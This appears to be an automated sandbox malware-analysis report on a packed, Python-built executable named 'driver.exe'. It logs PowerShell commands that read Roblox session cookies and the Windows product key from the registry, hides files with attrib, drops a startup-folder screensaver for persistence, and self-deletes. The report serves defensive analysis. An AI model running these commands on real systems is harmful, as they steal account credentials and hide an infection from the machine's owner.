Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: driver.exe, 00000002.00000002.2454106900.00007FF8B8AF1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.pdbhP source: powershell.exe, 0000002F.00000002.2261891481.0000028F80385000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052933128.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp

Source: driver.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: driver.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: driver.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: driver.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: driver.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: api-ms-win-core-console-l1-1-0.dll.0.dr

Static PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"

Source: C:\Users\user\Desktop\driver.exe

Code function: 2_2_00007FF8A8030330 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FF8A8030330

Source: python313.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x1c507d
Source: driver.exe	Static PE information: real checksum: 0x867137 should be: 0x8602a2
Source: _sqlite3.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x11179
Source: unicodedata.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x4f800
Source: _ssl.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x172ba
Source: c4gv4hox.dll.58.dr	Static PE information: real checksum: 0x0 should be: 0x461d
Source: libcrypto-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x197f77
Source: _decimal.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x26383
Source: _lzma.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1cde8
Source: _bz2.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x1aa93
Source: libffi-8.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _queue.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0xb09a
Source: _socket.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x14770
Source: _hashlib.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x18eb4
Source: libssl-3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x4330c
Source: select.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x8e73
Source: _ctypes.pyd.0.dr	Static PE information: real checksum: 0x0 should be: 0x12948
Source: sqlite3.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xae9be

Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.0.dr	Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A7F8AC25 push rcx; ret	2_2_00007FF8A7F8AC62
Source: C:\Users\user\Desktop\driver.exe	Code function: 2_2_00007FF8A8064331 push rcx; ret	2_2_00007FF8A8064332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF845F5D2A5 pushad ; iretd	14_2_00007FF845F5D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF84607862D push ebx; ret	14_2_00007FF8460786CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF84607861D push ebx; ret	14_2_00007FF84607862A

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Uses attrib.exe to hide files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\driver.exe"

Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe	Jump to dropped file

Source: C:\Users\user\Desktop\driver.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr

Jump to behavior

Source: C:\Users\user\Desktop\driver.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""			Jump to behavior

Source: C:\Users\user\Desktop\driver.exe

Code function: 0_2_00007FF6A29B5820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF6A29B5820

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
